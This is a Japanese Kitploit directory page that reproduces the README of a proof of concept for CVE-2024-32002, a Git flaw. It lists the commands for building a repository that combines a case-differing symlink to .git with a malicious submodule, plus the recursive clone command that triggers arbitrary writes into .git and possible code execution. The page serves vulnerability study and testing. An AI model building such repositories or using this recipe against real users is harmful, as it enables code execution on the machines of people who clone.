Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2024-32002-poc-aw — CVE-2024-32002 の POC。.git ディレクトリへの任意書き込みを実証します。 | Kitploit
ツール/GitHubGitHub/jakob-pennington/cve-2024-32002-poc-aw
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubjakob-pennington/cve-2024-32002-poc-aw

cve-2024-32002-poc-aw

CVE-2024-32002 の POC。.git ディレクトリへの任意書き込みを実証します。

リポジトリを見る
452年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-32002 PRC AW

CVE-2024-32002 の PoC で、.git ディレクトリへの任意書き込みを実証します。

関連するサブモジュールリポジトリについては cve-2024-32002-submodule-aw を参照してください。

このリポジトリの内容

  • .git ディレクトリにリンクする任意の名前のシンボリックリンク。
  • 悪意のあるサブモジュールを定義する .gitmodules ファイル。

このリポジトリの再現方法

このリポジトリは Linux (正確には WSL2) で作成されました。これは重要です。悪意のあるリポジトリは、大文字小文字を区別するファイルシステム上でしか作成できません。

  1. すべて小文字を使用してシンボリックリンクを作成します
root@kitploit:~
ln -s .git submodule

注記:

  • シンボリックリンクは .git フォルダを指す必要があります。ここにファイルを書き込みたいからです。
  • シンボリックリンク名 (submodule) は任意ですが、小文字で始まる必要があります。
  • これは重要です。小文字は大文字よりも前にソートされるためです。クローン作成マシンがサブモジュールファイルの書き込み先を混乱した場合、通常のディレクトリではなくシンボリックリンクを選択させたいのです。
  1. サブモジュールディレクトリ名の大文字小文字の違いに注意して、悪意のあるサブモジュールを追加します
root@kitploit:~
git submodule add --name aw https://github.com/JakobTheDev/cve-2024-32002-submodule-aw.git Submodule/notexists

注記:

  • サブモジュールの名前は重要です。サブモジュール内にフックを配置する際に影響します。
  • サブモジュールのパスの最初のセグメント ("Submodule") は、上記のシンボリックリンク名と大文字小文字だけが異なるように一致させる必要があります。
  • パスには少なくとももう 1 つのセグメントが必要です。git は空のディレクトリにしかサブモジュールをクローンしないためです。ただし、ディレクトリは自動的に作成されるので、それを示すために "notexists" を選びました。

POC の実行方法

  1. 影響を受けるバージョンの git を使用しているか確認してください。影響を受けるバージョンについては GitHub advisory を参照してください。
root@kitploit:~
git --version
  1. RCE を達成できる可能性のあるコマンドを意図的に実行したいかどうか考えてください... このリポジトリは無害ですが、本当に実行しますか?
  2. 次のコマンドを実行します:
root@kitploit:~
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-aw.git
  1. .git ディレクトリの中を見てください。何か変なものはありませんか。ヒント: submodule にはどのファイルがありますか?
ツールをダウンロード